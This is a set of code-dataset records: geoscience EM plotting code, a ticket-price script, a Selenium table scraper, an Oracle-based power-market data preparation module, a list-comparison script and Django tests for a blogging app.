y1, y2, y2, y1],\n [z1, z1, z1, z1, z2, z2, z2, z2],\n ]\n )\n xyz = block_xyz.T\n # Face 1\n ax.add_collection3d(\n Poly3DCollection(\n [list(zip(xyz[:4, 0] + xc, xyz[:4, 1] + yc, xyz[:4, 2] + zc))],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 2\n ax.add_collection3d(\n Poly3DCollection(\n [list(zip(xyz[4:, 0] + xc, xyz[4:, 1] + yc, xyz[4:, 2] + zc))],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 3\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[0, 1, 5, 4], 0] + xc,\n xyz[[0, 1, 5, 4], 1] + yc,\n xyz[[0, 1, 5, 4], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 4\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[3, 2, 6, 7], 0] + xc,\n xyz[[3, 2, 6, 7], 1] + yc,\n xyz[[3, 2, 6, 7], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 5\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[0, 4, 7, 3], 0] + xc,\n xyz[[0, 4, 7, 3], 1] + yc,\n xyz[[0, 4, 7, 3], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 6\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[1, 5, 6, 2], 0] + xc,\n xyz[[1, 5, 6, 2], 1] + yc,\n xyz[[1, 5, 6, 2], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n ax.set_xlim(X1, X2)\n ax.set_ylim(Y1, Y2)\n ax.set_zlim(Z1, Z2)\n ax.set_xlabel(\"X (m)\")\n ax.set_ylabel(\"Y (m)\")\n ax.set_zlabel(\"Depth (m)\")\n # ax.set_aspect(\"equal\")\n ax.view_init(elev=elev, azim=azim)\n plt.show()\n\n def plot_input_currents(self, itime, scale):\n plt.figure()\n\n plt.plot(self.times * 1e3, self.input_currents, \"k|-\")\n plt.plot(self.times[itime] * 1e3, self.input_currents[itime], \"ro\")\n plt.xlabel(\"Time (ms)\")\n plt.ylabel(\"Normalized current\")\n plt.xscale(scale)\n plt.show()\n\n def getSlices(self, mesh, vec, itime, normal=\"Z\", loc=0.0, isz=False):\n VEC = vec[:, itime].reshape((mesh.nC, 3), order=\"F\")\n if normal == \"Z\":\n ind = 
np.argmin(abs(mesh.cell_centers_z - loc))\n            vx = VEC[:, 0].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[:, :, ind]\n            vy = VEC[:, 1].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[:, :, ind]\n            vz = VEC[:, 2].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[:, :, ind]\n            xy = utils.ndgrid(mesh.cell_centers_x, mesh.cell_centers_y)\n            if isz:\n                return utils.mkvc(vz), xy\n            else:\n                return np.c_[utils.mkvc(vx), utils.mkvc(vy)], xy\n\n        elif normal == \"Y\":\n            ind = np.argmin(abs(mesh.cell_centers_y - loc))\n            vx = VEC[:, 0].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[:, ind, :]\n            vy = VEC[:, 1].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[:, ind, :]\n            vz = VEC[:, 2].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[:, ind, :]\n            xz = utils.ndgrid(mesh.cell_centers_x, mesh.cell_centers_z)\n            if isz:\n                return utils.mkvc(vz), xz\n            else:\n                return np.c_[utils.mkvc(vx), utils.mkvc(vz)], xz\n\n        elif normal == \"X\":\n            ind = np.argmin(abs(mesh.cell_centers_x - loc))\n            vx = VEC[:, 0].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[ind, :, :]\n            vy = VEC[:, 1].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[ind, :, :]\n            vz = VEC[:, 2].reshape((mesh.shape_cells[0], mesh.shape_cells[1], mesh.shape_cells[2]), order=\"F\")[ind, :, :]\n            yz = utils.ndgrid(mesh.cell_centers_y, mesh.cell_centers_z)\n            if isz:\n                return utils.mkvc(vz), yz\n            else:\n                return np.c_[utils.mkvc(vy), utils.mkvc(vz)], yz\n\n    def plot_electric_currents(self, itime):\n        exy, xy = self.getSlices(self.mesh, self.J, itime, normal=\"Z\", loc=-100.5)\n        exz, xz = self.getSlices(self.mesh, self.J, itime, normal=\"Y\", loc=0.0)\n        label = \"Current density (A/m$^2$)\"\n        plt.figure(figsize=(12, 5))\n        ax1 = plt.subplot(121)\n        ax2 = plt.subplot(122)\n        vmin, vmax = abs(np.r_[exz]).min(), abs(np.r_[exz]).max()\n        out_xz = utils.plot2Ddata(\n            xz, exz, vec=True, ncontour=20, contourOpts={\"cmap\": \"viridis\"}, ax=ax2\n        )\n        vmin, vmax = out_xz[0].get_clim()\n        utils.plot2Ddata(\n            xy,\n            exy,\n            vec=True,\n            ncontour=20,\n            contourOpts={\"cmap\": \"viridis\", \"vmin\": vmin, \"vmax\": vmax},\n            ax=ax1,\n        )\n        ax1.set_aspect(\"equal\", adjustable=\"box\")\n        ax2.set_aspect(\"equal\", adjustable=\"box\")\n        plt.colorbar(\n            out_xz[0],\n            ax=ax1,\n            format=\"%.1e\",\n            ticks=np.linspace(vmin, vmax, 5),\n            fraction=0.02,\n        )\n        cb = plt.colorbar(\n            out_xz[0],\n            ax=ax2,\n            format=\"%.1e\",\n            ticks=np.linspace(vmin, vmax, 5),\n            fraction=0.02,\n        )\n        cb.set_label(label)\n        ax1.set_title(\"\")\n        ax1.set_xlabel(\"X (m)\")\n        ax1.set_ylabel(\"Y (m)\")\n        ax2.set_xlabel(\"X (m)\")\n        ax2.set_ylabel(\"Z (m)\")\n        ax1.set_xlim(self.xmin, self.xmax)\n        ax1.set_ylim(self.ymin, self.ymax)\n        ax2.set_xlim(self.xmin, self.xmax)\n        ax2.set_ylim(self.zmin, self.zmax)\n\n        ax1.plot(ax1.get_xlim(), np.zeros(2), \"k--\", lw=1)\n        ax2.plot(ax1.get_xlim(), np.zeros(2) - 100.0, \"k--\", lw=1)\n        title = (\"Time at %.2f ms\") % ((self.times[itime]) * 1e3)\n        ax1.set_title(title)\n        plt.tight_layout()\n        plt.show()\n\n    def plot_magnetic_flux(self, itime):\n        bxy, xy = self.getSlices(self.mesh, self.B, itime, normal=\"Z\", loc=-100.5)\n        byz, yz = self.getSlices(self.mesh, self.B, itime, 
normal=\"X\", loc=0.0)\n label = \"Magnetic flux density (T)\"\n plt.figure(figsize=(12, 5))\n ax1 = plt.subplot(121)\n ax2 = plt.subplot(122)\n vmin, vmax = abs(np.r_[byz]).min(), abs(np.r_[byz]).max()\n out_yz = utils.plot2Ddata(\n yz, byz, vec=True, ncontour=20, contourOpts={\"cmap\": \"viridis\"}, ax=ax2\n )\n vmin, vmax = out_yz[0].get_clim()\n utils.plot2Ddata(\n xy,\n bxy,\n vec=True,\n ncontour=20,\n contourOpts={\"cmap\": \"viridis\", \"vmin\": vmin, \"vmax\": vmax},\n ax=ax1,\n )\n ax1.set_aspect(\"equal\", adjustable=\"box\")\n ax2.set_aspect(\"equal\", adjustable=\"box\")\n plt.colorbar(\n out_yz[0],\n ax=ax1,\n format=\"%.1e\",\n ticks=np.linspace(vmin, vmax, 5),\n fraction=0.02,\n )\n cb = plt.colorbar(\n out_yz[0],\n ax=ax2,\n format=\"%.1e\",\n ticks=np.linspace(vmin, vmax, 5),\n fraction=0.02,\n )\n cb.set_label(label)\n ax1.set_title(\"\")\n ax1.set_xlabel(\"X (m)\")\n ax1.set_ylabel(\"Y (m)\")\n ax2.set_xlabel(\"Y (m)\")\n ax2.set_ylabel(\"Z (m)\")\n ax1.set_xlim(self.xmin, self.xmax)\n ax1.set_ylim(self.ymin, self.ymax)\n ax2.set_xlim(self.xmin, self.xmax)\n ax2.set_ylim(self.zmin, self.zmax)\n ax1.plot(ax1.get_xlim(), np.zeros(2), \"k--\", lw=1)\n ax2.plot(ax1.get_xlim(), np.zeros(2) - 100.0, \"k--\", lw=1)\n title = (\"Time at %.2f ms\") % ((self.times[itime]) * 1e3)\n ax1.set_title(title)\n plt.tight_layout()\n plt.show()\n","repo_name":"geoscixyz/geosci-labs","sub_path":"geoscilabs/em/TDEMGroundedSource.py","file_name":"TDEMGroundedSource.py","file_ext":"py","file_size_in_byte":17641,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"90"} +{"seq_id":"3339618536","text":"a=input(\"How old are you? \")\r\na=int(a)\r\n\r\n\r\n\r\nif (a>=18):\r\n tic=input(\"How many tickets you want? \")\r\n tic=int(tic)\r\n if tic>=20:\r\n result=(\"Here you go with 2% discount\",(tic*20)/100*98, \"$\")\r\n \r\n \r\n\r\n \r\n \r\n else:\r\n print(\"You have to pay \", tic*20, \"$\")\r\n\r\nif a<=17:\r\n print(\"You are not old enough to buy tickets\")\r\n print(\"Bring a adult with you\")\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"ali786665s/Python-","sub_path":"arthimetic.py","file_name":"arthimetic.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"72020113898","text":"'''\n获取 http://stock.jrj.com.cn/report/plsj.shtml?to=pc 中的季报预披露时间\n\n'''\nimport csv\nfrom selenium import webdriver # 用来驱动浏览器的\nfrom selenium.webdriver.common.by import By # 按照什么方式查找,By.ID,By.CSS_SELECTOR\n\n\n\ncsvFile=open('预披露时间.csv', mode='w+',newline='',encoding='utf-8')\nwr= csv.writer(csvFile)\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(5)\n\ndriver.get(\"http://stock.jrj.com.cn/report/plsj.shtml?to=pc\")\n\ntable_element=driver.find_element(By.XPATH, '//*[@id=\"ntabHeader\"]/table')\nline = table_element.find_element(By.CSS_SELECTOR,'tr')\n\nstr_list=[]\nfor row in line.find_elements(By.CSS_SELECTOR, 'th'):\n str_list.append(row.text)\n\nprint(\"head is :\\n\",str_list)\nwr.writerow(str_list)\n\n\ntable_element=driver.find_element(By.XPATH, '//*[@id=\"ntabBody\"]/table')\nlines = table_element.find_elements(By.CSS_SELECTOR,'tr')\nfor line in lines:\n str_list = []\n for row in line.find_elements(By.CSS_SELECTOR, 'td'):\n str_list.append(row.text)\n\n wr.writerow(str_list)\n\n\n\n#print(str_list)\n\n\n\n\n\n\n'''\n# 先抓取\ndf = pd.read_html(f'http://stock.jrj.com.cn/report/plsj.shtml?to=pc', encoding='gbk', header=0)[1]\nprint(df)\ndf.to_csv('预披露时间.csv', 
mode='w', index=False) # write out\n\ndf_table=pd.read_html(table_element)[0]\n\ndf_table.to_csv('预披露时间.csv', mode='a+', index=False) # append\n\n\nimport pandas as pd\ndf = pd.read_html(f'http://stock.jrj.com.cn/report/plsj.shtml?to=pc', encoding='gbk', header=0)[1]\nfor i in range(len(dfs)):\n print(\"{a} is:\".format(a=i),dfs[i])\n\nSee https://stackoverflow.com/questions/58775641/pandas-read-html-not-wait-for-page-loading\nwhich notes that read_html can only scrape tables from static HTML pages; for\ntables generated by JS you have to use selenium\n\n'''\n","repo_name":"todaygood/note-python","sub_path":"practise/YuPiLuTime_to_csv.py","file_name":"YuPiLuTime_to_csv.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"39922080005","text":"import time\nfrom utils import ora\nfrom utils.progress_bar import update_progress\nimport sql_scripts\nfrom eq_db.classes.demands import DpgDemand, DpgDemandSystem, DpgDemandLoad, DpgDemandFSK\nfrom eq_db.classes.supplies import DpgSupply\nfrom eq_db.classes.dpg_list import DpgList\nfrom eq_db.classes.dpg import DpgImpex\nfrom eq_db.classes.nodes import make_nodes\nfrom eq_db.classes.lines import make_lines\nfrom eq_db.classes.sections import make_sections\n# import random\nimport mat4py\n\n\ndef make_dpgs(tsid, tdate='', nodes=None, lines=None, sections=None):\n# tsid = 221348901\n# tdate = '01.01.1970'\n\n    if tdate:\n        print('preparing dpgs for', tdate)\n    start_time = time.time()\n\n    if not nodes:\n        nodes = make_nodes(tsid, tdate)\n\n    if not lines:\n        lines = make_lines(tsid, tdate, nodes)\n\n    if not sections:\n        sections = make_sections(tsid, tdate, lines)\n\n    cs = sql_scripts.ConsumersScript()\n    gs = sql_scripts.GeneratorsScript()\n    imp_s = sql_scripts.ImpexDpgsScript()\n    bs = sql_scripts.BidsScript()\n    ks = sql_scripts.KcNodeScript()\n    kr = sql_scripts.KgRgeScript()\n    rgs = sql_scripts.RastrGenScript()\n    rs = sql_scripts.RastrConsumerScript()\n    ls = sql_scripts.RastrLoadScript()\n    ra = sql_scripts.RastrAreaScript()\n\n    con = ora.OracleConnection()\n\n    DpgDemand.set_max_bid_prices(con.exec_script(sql_scripts.MaxBidPriceScript().get_query(), {'tsid': tsid}))\n    DpgDemand.add_disqualified_data(con.exec_script(sql_scripts.DisqualifiedDataScript().get_query(), {'tsid': tsid}))\n    DpgSupply.set_wsum_data(con.exec_script(sql_scripts.WsumgenScript().get_query(), {'tsid': tsid}))\n\n    # dpgs = []\n    dpgs = DpgList()\n    # dpgs_index = {}\n    consumers_index = {}\n    dpg_areas_index = {}\n\n    @ora.process_cursor(con, cs, {'tsid': tsid})\n    def process_consumers(new_row, dpg_list):\n        dpg_list.add_consumer(new_row)\n\n    @ora.process_cursor(con, gs, {'tsid': tsid})\n    def process_generators(new_row, dpg_list):\n        dpg_list.add_generator(new_row)\n\n    @ora.process_cursor(con, imp_s, {'tsid': tsid})\n    def process_impex_dpgs(new_row, dpg_list):\n        dpg_list.add_impex(new_row)\n\n    @ora.process_cursor(con, rgs, {'tsid': tsid})\n    def process_generator_data(new_row, dpg_list):\n        dpg_id = new_row[rgs['dpg_id']]\n        if dpg_list[dpg_id]:\n            dpg_list[dpg_id].add_generator_data(new_row)\n\n    @ora.process_cursor(con, bs, {'tsid': tsid})\n    def process_bids(new_row, dpg_list):\n        dpg_id = new_row[bs['dpg_id']]\n        if dpg_list[dpg_id]:\n            dpg_list[dpg_id].add_bid_data(new_row)\n\n    @ora.process_cursor(con, ks, {'tsid': tsid})\n    def process_k_distr(new_row, dpg_list):\n        dpg_id = new_row[ks['dpg_id']]\n        if dpg_list[dpg_id]:\n            dpg_list[dpg_id].add_k_distr_data(new_row)\n\n    @ora.process_cursor(con, kr, {'tsid': tsid})\n    def process_k_rge_distr(new_row, dpg_list):\n
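# Note (added): each @ora.process_cursor-decorated callback above and below is
# presumably invoked once per fetched cursor row by the decorator; the script
# objects (kr, rs, ls, ra, ...) appear to act as column-name -> index maps, so
# new_row[kr['dpg_id']] reads the dpg_id column of the current row.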
dpg_id = new_row[kr['dpg_id']]\n if dpg_list[dpg_id]:\n dpg_list[dpg_id].add_k_distr_data(new_row)\n\n @ora.process_cursor(con, rs, {'tsid': tsid})\n def process_rastr_consumer(new_row, dpg_list):\n consumer_code = new_row[rs['consumer_code']]\n if dpg_list.get_consumer_by_code(consumer_code):\n dpg_list.get_consumer_by_code(consumer_code).add_consumer_data(new_row)\n\n @ora.process_cursor(con, ls, {'tsid': tsid})\n def process_rastr_load(new_row, dpg_list):\n consumer_code = new_row[ls['consumer_code']]\n if dpg_list.get_consumer_by_code(consumer_code):\n dpg_list.get_consumer_by_code(consumer_code).add_load_data(new_row)\n\n @ora.process_cursor(con, ra, {'tsid': tsid})\n def process_rastr_area(new_row, dpg_list):\n area = new_row[ra['area']]\n if dpg_list.get_consumer_by_area(area):\n dpg_list.get_consumer_by_area(area).add_area_data(new_row)\n\n # print('getting consumer DPGs')\n # process_consumers(dpgs)\n # process_rastr_consumer(dpgs)\n # process_rastr_load(dpgs)\n # process_rastr_area(dpgs)\n # for dpg in dpgs:\n # dpg.attach_nodes(nodes)\n #\n # print('getting supplier DPGs')\n # process_generators(dpgs)\n\n print('getting impex DPGs')\n process_impex_dpgs(dpgs)\n for i, d in enumerate(dpgs):\n d.attach_sections(sections)\n update_progress((i + 1) / len(dpgs))\n\n # R = random.randint(0, len(dpgs))\n # DPGCODE = dpgs[R].code\n # DPGID = dpgs[R].id\n\n # print('getting generator information')\n # process_generator_data(dpgs)\n\n\n\n # print('getting bid information')\n # process_bids(dpgs)\n # #\n # # print('getting k_distr information')\n # # process_k_distr(dpgs)\n # # process_k_rge_distr(dpgs)\n #\n # print(\"distributing consumer's bids\")\n # for i, d in enumerate(dpgs):\n # d.finalize_data()\n # d.distribute_bid()\n # d.prepare_generator_data()\n # d.prepare_fixedgen_data(nodes)\n # d.attach_to_fed_station(dpgs)\n # update_progress((i + 1) / len(dpgs))\n #\n # for i, d in enumerate(dpgs):\n # d.prepare_fixedcon_data()\n # update_progress((i + 1) / len(dpgs))\n # print('done!')\n # [print(d, i) for d, i in zip(dpgs, dpgs_index)]\n\n print('---------- %s seconds -----------' % (time.time() - start_time))\n\n # print(R, DPGCODE, dpgs[R].consumer_code, len(dpgs[dpgs_index[DPGID]].get_distributed_bid()))\n # [print(d) for d in dpgs[dpgs_index[907]].get_distributed_bid()]\n return dpgs, sections\n\n\ndef make_distributed_bids(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n eq_db_supplies = []\n eq_db_demands = []\n eq_db_impexbids = []\n for dpg in dpgs:\n if isinstance(dpg, DpgSupply):\n eq_db_supplies += dpg.get_distributed_bid()\n elif isinstance(dpg, DpgDemand):\n eq_db_demands += dpg.get_distributed_bid()\n elif isinstance(dpg, DpgImpex):\n eq_db_impexbids += dpg.get_distributed_bid()\n return eq_db_supplies, eq_db_demands, eq_db_impexbids\n\n\ndef make_fixedgen_data(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n fixedgen = []\n for dpg in dpgs:\n if isinstance(dpg, DpgSupply):\n fixedgen += dpg.get_fixedgen_data()\n return fixedgen\n\n\ndef make_generator_data(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n eq_db_generators = []\n for dpg in dpgs:\n if isinstance(dpg, DpgSupply):\n eq_db_generators += dpg.get_prepared_generator_data()\n return eq_db_generators\n\n\ndef make_fixedcon_data(tsid, tdate=''):\n dpgs = make_dpgs(tsid, tdate)\n fixedcon = []\n for dpg in dpgs:\n if isinstance(dpg, DpgDemand):\n fixedcon += dpg.get_fixedcon_data()\n return fixedcon\n\n\ndef make_eq_db_nodes_pq(tsid, tdate=''):\n nodes = make_nodes(tsid, tdate)\n dpgs = make_dpgs(tsid, tdate, 
nodes)\n\n eq_db_nodes_pq = []\n eq_db_nodes_pq_index = {}\n ns_pq = {'p_cons_minus_gen': 3, 'cons': 8, 'gen': 9}\n\n eq_db_nodes_pv = []\n eq_db_nodes_pv_index = {}\n ns_pv = {'p_gen': 3, 'cons': 12, 'gen': 13}\n\n eq_db_nodes_sw = []\n\n fis = {'hour': 0, 'node_code': 1, 'value': 2}\n for i, node in enumerate(nodes):\n node_pq_index = {}\n node_pv_index = {}\n fixedimpex = node.get_impex_data()\n\n for hour, node_hour in enumerate(node.hour_data):\n if not node_hour.is_node_on():\n continue\n fixedimpex_hour = [f for f in fixedimpex if f[fis['hour']] == hour]\n if len(fixedimpex_hour) > 1:\n raise Exception('wrong fixedimpex count for node %i' % node.node_code)\n if fixedimpex_hour:\n impex_value = fixedimpex_hour[0][fis['value']]\n else:\n impex_value = 0\n\n if node_hour.type == 1:\n node_pq_index[hour] = len(eq_db_nodes_pq)\n eq_db_nodes_pq.append([\n hour, node.node_code, node.voltage_class, impex_value, node_hour.qn, 1.4 * node.voltage_class,\n 0.75 * node.voltage_class, node_hour.qg, max(impex_value, 0), -1 * min(impex_value, 0)\n ])\n elif node_hour.type > 1:\n node_pv_index[hour] = len(eq_db_nodes_pv)\n eq_db_nodes_pv.append([\n hour, node.node_code, node.voltage_class, impex_value, max(node_hour.max_q, -10000),\n min(node_hour.min_q, 10000), 1.4 * node.voltage_class, 0.75 * node.voltage_class,\n node_hour.qn, node_hour.qg, node_hour.type, node.fixed_voltage, -1 * min(impex_value, 0),\n max(impex_value, 0)\n ])\n elif node_hour.is_balance_node():\n relative_voltage = (node.fixed_voltage if node.fixed_voltage else node.nominal_voltage)\\\n / node.voltage_class\n eq_db_nodes_sw.append((\n hour, node.node_code, node.voltage_class, -node_hour.pn, relative_voltage, 0,\n max(node_hour.max_q, -10000), min(node_hour.min_q, 10000)\n ))\n\n if node_pq_index:\n eq_db_nodes_pq_index[node.node_code] = node_pq_index\n if node_pv_index:\n eq_db_nodes_pv_index[node.node_code] = node_pv_index\n\n # fixedgen = []\n fgs = {'hour': 0, 'node_code': 2, 'value': 4}\n for i, dpg in enumerate(dpgs):\n if isinstance(dpg, DpgSupply):\n for fixedgen in dpg.get_fixedgen_data():\n node_code = fixedgen[fgs['node_code']]\n hour = fixedgen[fgs['hour']]\n if node_code in eq_db_nodes_pq_index.keys():\n ni = eq_db_nodes_pq_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pq[ni[hour]][ns_pq['p_cons_minus_gen']] += fixedgen[fgs['value']]\n eq_db_nodes_pq[ni[hour]][ns_pq['gen']] += -fixedgen[fgs['value']]\n\n elif node_code in eq_db_nodes_pv_index.keys():\n ni = eq_db_nodes_pv_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pv[ni[hour]][ns_pv['p_gen']] += fixedgen[fgs['value']]\n eq_db_nodes_pv[ni[hour]][ns_pv['gen']] += fixedgen[fgs['value']]\n\n # fixedcon = []\n fcs = {'hour': 0, 'node_code': 1, 'value': 3}\n for i, dpg in enumerate(dpgs):\n if isinstance(dpg, DpgDemand):\n for fixedcon in dpg.get_fixedcon_data():\n node_code = fixedcon[fcs['node_code']]\n hour = fixedcon[fcs['hour']]\n if node_code in eq_db_nodes_pq_index.keys():\n ni = eq_db_nodes_pq_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pq[ni[hour]][ns_pq['p_cons_minus_gen']] += fixedcon[fcs['value']]\n eq_db_nodes_pq[ni[hour]][ns_pq['cons']] += fixedcon[fcs['value']]\n\n elif node_code in eq_db_nodes_pv_index.keys():\n ni = eq_db_nodes_pv_index[node_code]\n if hour not in ni.keys():\n continue\n eq_db_nodes_pv[ni[hour]][ns_pv['p_gen']] += fixedcon[fcs['value']]\n eq_db_nodes_pv[ni[hour]][ns_pv['cons']] += -fixedcon[fcs['value']]\n\n # fixedimpex = []\n # fis = {'hour': 0, 'node_code': 1, 
'value': 2}\n    # for n in nodes:\n    #     fixedimpex += n.get_impex_data()\n\n    return eq_db_nodes_pq, eq_db_nodes_pv, eq_db_nodes_sw\n\n\ndef make_sections_impex_data(tsid, tdate=''):\n    dpgs, sections = make_dpgs(tsid, tdate)\n    sections_impex = []\n    for s in sections:\n        sections_impex += s.get_section_impex_data()\n    return sections_impex\n\n\ndef make_sections_lines_impex_data(tsid, tdate=''):\n    dpgs, sections = make_dpgs(tsid, tdate)\n    sections_lines_impex_data = []\n    for s in sections:\n        sections_lines_impex_data += s.get_section_lines_impex_data()\n    return sections_lines_impex_data\n\n\ndef make_sections_data(tsid, tdate=''):\n    dpgs, sections = make_dpgs(tsid, tdate)\n    sections_data = []\n    for s in sections:\n        sections_data += s.get_section_data()\n    return sections_data\n\n\ndef make_sections_lines_data(tsid, tdate=''):\n    dpgs, sections = make_dpgs(tsid, tdate)\n    sections_lines_data = []\n    for s in sections:\n        sections_lines_data += s.get_section_lines_data()\n    return sections_lines_data\n","repo_name":"konstantinov90/calc_factory","sub_path":"eq_db/distributed_bids.py","file_name":"distributed_bids.py","file_ext":"py","file_size_in_byte":12506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"43684472563","text":"list1 = [10, 20, 30, 40, 50, 60] #created list 1\nlist2 = [10, 20, 30, 50, 40, 60,60] #created list 2\n\nif len(list1)==len(list2):\n    list1.sort() #sorting the list\n    list2.sort() #sorting the list\n    for i in range(0,len(list1)): #iterate over the indices of the lists\n        if list1[i]!=list2[i]:\n            print(\"lists are not the same\")\n            break #stop at the first mismatch\n        if i==len(list1)-1: #indices start at 0, so the last index is len-1\n            print(\"both lists are the same\")\nelse:\n    print(\"lists are not the same length, so they cannot be equal\")\n# A Counter-based alternative is sketched after this record.\n","repo_name":"TheAkshrCompany/Python","sub_path":"comparinglist.py","file_name":"comparinglist.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71441126056","text":"from django.test import TestCase, Client\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.core.cache import cache\nimport os\n\nfrom .models import Post, Group, Comment\nfrom PIL import Image\n\n\nUser = get_user_model()\n\n\ndef test_context(self, response):\n    self.assertEqual(response.context['page'][0].text, 'No fate')\n    self.assertEqual(response.context['page'][0].author, self.user)\n    self.assertEqual(response.context['page'][0].group, self.group)\n\n\nclass TestProfile(TestCase):\n    def setUp(self):\n        self.client = Client()\n        self.client2 = Client()\n        self.user = User.objects.create_user(\n            username='sarah', email='s.conor@mail.ru', password='234567Abc'\n        )\n        self.group = Group.objects.create(\n            title='test_group',\n            slug='test_group',\n            description='test'\n        )\n        self.client.force_login(self.user)\n        self.post = self.client.post(reverse('new_post'), {\n            'text': 'No fate',\n            'group': 1\n        })\n        self.user2 = User.objects.create_user(\n            username='john', email='j.conor@mail.ru', password='123456Abc'\n        )\n        self.client2.force_login(self.user2)\n        response = self.client2.get(reverse(\n            'profile_follow',\n            args=[self.user.username]\n        ),\n            follow=True\n        )\n        cache.clear()\n\n    def test_profile(self):\n        response = self.client.get(reverse(\n            'profile',\n            args=[self.user.username]\n        ))\n        self.assertEqual(response.status_code, 200)\n\n# An authorized user can publish a post (new)\n
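# Aside on comparinglist.py above: a minimal alternative sketch (not part of
# either original file) that compares the two lists as multisets, so sorting
# copies and scanning by index becomes unnecessary.
from collections import Counter

def lists_match(a, b):
    # True iff both lists contain the same elements with the same counts
    return Counter(a) == Counter(b)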
    def test_new_post(self):\n        self.assertEqual(Post.objects.all().count(), 1)\n        first_post = Post.objects.first()\n        self.assertEqual(first_post.text, 'No fate')\n        self.assertEqual(first_post.author, self.user)\n        self.assertEqual(first_post.group, self.group)\n\n# After a post is published, the new entry appears on the site's main page\n    def test_post_index(self):\n        response = self.client.get(reverse('index'))\n        test_context(self, response)\n\n# on the user's personal page (profile)\n    def test_post_profile(self):\n        response = self.client.get(reverse(\n            'profile',\n            args=[self.user.username]\n        ))\n        test_context(self, response)\n\n# and on the post's own page (post)\n    def test_post_page(self):\n        response = self.client.get(reverse(\n            'post',\n            args=[\n                self.user.username,\n                Post.objects.first().id\n            ]\n        ))\n        self.assertEqual(response.context['post'].text, 'No fate')\n        self.assertEqual(response.context['post'].author, self.user)\n        self.assertEqual(response.context['post'].group, self.group)\n\n# An authorized user can edit their post,\n# and its content changes on all related pages\n    def test_post_edit(self):\n        self.client.force_login(self.user)\n        new_post = self.client.post(reverse(\n            'post_edit',\n            args=[\n                self.user.username,\n                Post.objects.first().id\n            ]\n        ),\n            {'text': 'T1000 - loh'}\n        )\n        response = self.client.get(reverse(\n            'profile',\n            args=[self.user.username]\n        ))\n        self.assertEqual(response.context['posts'][0].text, 'T1000 - loh')\n        response = self.client.get(reverse(\n            'profile',\n            args=[self.user.username]\n        ))\n        self.assertEqual(response.context['posts'][0].group, None)\n        response = self.client.get(reverse('index'))\n        self.assertEqual(response.context['page'][0].text, 'T1000 - loh')\n        response = self.client.get(reverse(\n            'post',\n            args=[\n                self.user.username,\n                Post.objects.first().id\n            ]\n        ))\n        self.assertEqual(response.context['post'].text, 'T1000 - loh')\n\n    def test_cache_index_page(self):\n        self.client.force_login(self.user)\n        self.post = self.client.post(reverse('new_post'), {\n            'text': 'test2',\n            'group': 1\n        })\n        cache.clear()\n        response = self.client.get(reverse('index'))\n        self.assertIn('test2', response.content.decode())\n        self.post = self.client.post(reverse('new_post'), {\n            'text': 'test3',\n            'group': 1\n        })\n        response = self.client.get(reverse('index'))\n        self.assertNotIn('test3', response.content.decode())\n        cache.clear()\n        response = self.client.get(reverse('index'))\n        self.assertIn('test3', response.content.decode())\n\n# An unauthorized visitor cannot publish a post\n# (they are redirected to the login page)\n    def test_post(self):\n        self.client.logout()\n        response = self.client.post(\n            reverse('new_post'),\n            {\n                'text': 'Astala vista',\n                'group': 1\n            },\n            follow=True\n        )\n        self.assertEqual(\n            response.redirect_chain,\n            [('/auth/login/?next=/new/', 302)]\n        )\n        self.assertEqual(Post.objects.all().count(), 1)\n\n    def test_404(self):\n        response = self.client.get(reverse(\n            'post',\n            args=[\n                'nouser',\n                99999\n            ]\n        ))\n        self.assertEqual(response.status_code, 404)\n\n# An authorized user can follow other users and unfollow them.\n# A user's new post appears in the feed of those who follow them\n# and does not appear in the feed of those who do not.\n    def test_following(self):\n        response = self.client2.get(reverse(\n            'profile',\n            args=[self.user.username]\n        ))\n        self.assertEqual(True, response.context['following'])\n        response = self.client2.get(reverse('follow_index'))\n
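# Note (added): setUp already made client2's user follow sarah, so the feed
# fetched above should contain her 'No fate' post; the shared test_context()
# helper below re-checks its text, author and group.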
